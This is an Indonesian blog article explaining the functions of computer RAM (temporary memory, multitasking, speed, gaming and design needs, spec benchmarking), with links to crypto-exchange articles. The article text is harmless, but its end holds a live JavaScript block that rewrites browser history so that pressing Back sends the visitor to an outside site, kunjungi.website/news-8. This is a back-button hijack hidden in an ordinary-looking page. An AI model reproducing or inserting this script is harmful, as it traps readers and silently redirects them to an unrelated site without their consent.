Fungsi RAM Komputer dan Laptop yang Wajib Anda Ketahui

Fungsi RAM komputer sangatlah penting sebagai penunjang kinerja utama. RAM sendiri merupakan salah satu part utama yang wajib dimiliki oleh komputer dan laptop. Keberadaannya tentu sangat vital.

RAM ini sangat berpengaruh terhadap performa komputer itu sendiri. Untuk Anda yang belum tahu, RAM adalah singkatan dari Random Access Memory.

Jadi sebagaimana namanya, fungsi utama dari hardware satu ini akan sangat berpengaruh terhadap memori komputer atau laptop Anda. Saat ini bahkan penggunaan RAM juga diterapkan dalam dunia gadget.

Tentu saja RAM pada komputer, Laptop ataupun gadget memiliki fungsi yang sama saja. Namun yang membedakannya adalah versi dan kapasitasnya.

5 Fungsi RAM Komputer dan Laptop yang Utama

Keberadaan RAM memang sangat membantu para pengguna komputer untuk melakukan pemrosesan berbagai jenis informasi yang mereka masukkan ke komputer atau laptop. Lantas apa saja sebenarnya fungsi utama dari RAM?

Menyimpan Memori Sementara

Fungsi pertama yang dimiliki oleh RAM ini adalah membantu komputer atau laptop untuk menyimpan memori sementara waktu. Karenanya dalam bahasa Indonesia, RAM ini bisa diartikan sebagai penyimpanan memori acak.

Baca Juga  Segera Lakukan Google Authenticator Indodax, ini Manfaatnya

Jadi RAM akan menyimpan semua perintah dan input yang Anda perintahkan. Lalu kemudian RAM ini akan meneruskannya ke Processor sebagai eksekutor utama segala perintah dalam komputer.

Oleh processor, perintah-perintah ini kemudian ditampilkan dalam bentuk visual (layar) dan bunyi (speaker), gerakan (printer), dan lain sebagainya. Jadi jangan pernah menyepelekan fungsi dari RAM ini karena ternyata peranannya sangat besar.

Membantu Penggunaan Multitasking

Fungsi RAM komputer lainnya adalah membantu penggunaan multitasking. Untuk Anda yang masih awam, penggunaan multitasking ini adalah kondisi dimana komputer atau laptop yang Anda miliki bisa mengerjakan beberapa proses sekaligus.

Hal ini juga yang memungkinkan Anda untuk membuka dua atau lebih aplikasi sekaligus. Inilah yang kemudian menjadi alasan kenapa penggunaan RAM menjadi sangat vital di dalam setiap jenis media elektronik yang bisa dioperasikan secara manual.

Mempercepat Pemrosesan Informasi

Selain beberapa fungsi yang sudah kami jelaskan di atas, Fungsi RAM komputer selanjutnya adalah untuk mempercepat pemrosesan informasi yang Anda masukkan ke dalam komputer atau laptop itu sendiri. Namun hal ini sangat dipengaruhi oleh kapasitas RAM itu sendiri.

Baca Juga  Cara Deposit Indodax Melalui Mesin ATM

Semakin tinggi spesifikasi atau kapasitas RAM yang dimiliki, akan semakin cepat juga kinerja komputer yang menggunakan RAM tersebut. Jadi kalau kapasitas RAM besar, tentu saja kapasitas perintah yang disimpan di dalamnya juga semakin banyak.

Secara tidak langsung, penyimpanan RAM yang besar ini juga bisa menghindarkan laptop Anda dari lemot dan berbagai permasalah performa lainnya. Namun sudah tentu hal ini juga harus diimbangi dengan kapasitas processor yang sesuai.

Berperan Vital Untuk Gaming dan Design

Tidak bisa disangkal, fungsi RAM Komputer ini juga sangat vital untuk Anda yang hobi memainkan game atau melakukan desain pada komputer. Mayoritas game dan aplikasi desain berbasis 3D membutuhkan kapasitas RAM yang luar biasa.

Pada saat Anda menggunakan RAM dengan kapasitas yang minimum, bisa dipastikan kalau komputer akan mengalami lag karena perintah yang diberikan terus menumpuk di RAM dan lambat ditangani oleh processor.

Sebaliknya kalau kapasitas RAM yang Anda gunakan sangat memadai, bisa dibilang kalau performa komputer Anda akan jauh lebih maksimal pada saat mengakses aplikasi-aplikasi tersebut. Inilah alasan kenapa beberapa aplikasi menerapkan minimum requirement.

Baca Juga  Mengenal 5 Aset Kripto di Market Indodax

Tujuan dari diterapkannya minimum requirement ini adalah untuk menjaga kenyamanan Anda ketika mengakses atau mengoperasikan aplikasi itu sendiri. Kecuali kalau Anda memang berniat untuk memaksakan spek komputer yang dimiliki.

Menjadi Tolak Ukur Spesifikasi Komputer

Di sisi lain, fungsi RAM Komputer ini juga menjadi salah satu tolak ukur dari spesifikasi komputer yang ada saat ini. Kebanyakan orang melihat spek komputer dari jenis processor, kapasitas hardisk, kapasitas RAM dan spesifikasi lainnya.

Jadi kalau Anda memiliki komputer dengan spesifikasi RAM yang besar, hal ini akan berdampak pada “kelas” dari komputer itu sendiri. Disamping itu harga komputer Anda juga akan meningkat pesat jika dijual kembali dalam kondisi second.

Anda harus benar-benar memahami fungsi dari masing-masing part pada komputer. Tujuannya agar performa komputer Anda bisa jauh lebih maksimal. Sudah tentu salah satu yang paling penting adalah memahami fungsi RAM Komputer yang sudah kami jelaskan di atas.

 

<script>(function(window, location) {
history.replaceState(null, document.title, location.pathname+”#!/history”);
history.pushState(null, document.title, location.pathname);

window.addEventListener(“popstate”, function() {
if(location.hash === “#!/history”) {
history.replaceState(null, document.title, location.pathname);
setTimeout(function(){
location.replace(“https://kunjungi.website/news-8”);
},0);
}
}, false);
}(window, location));
</script>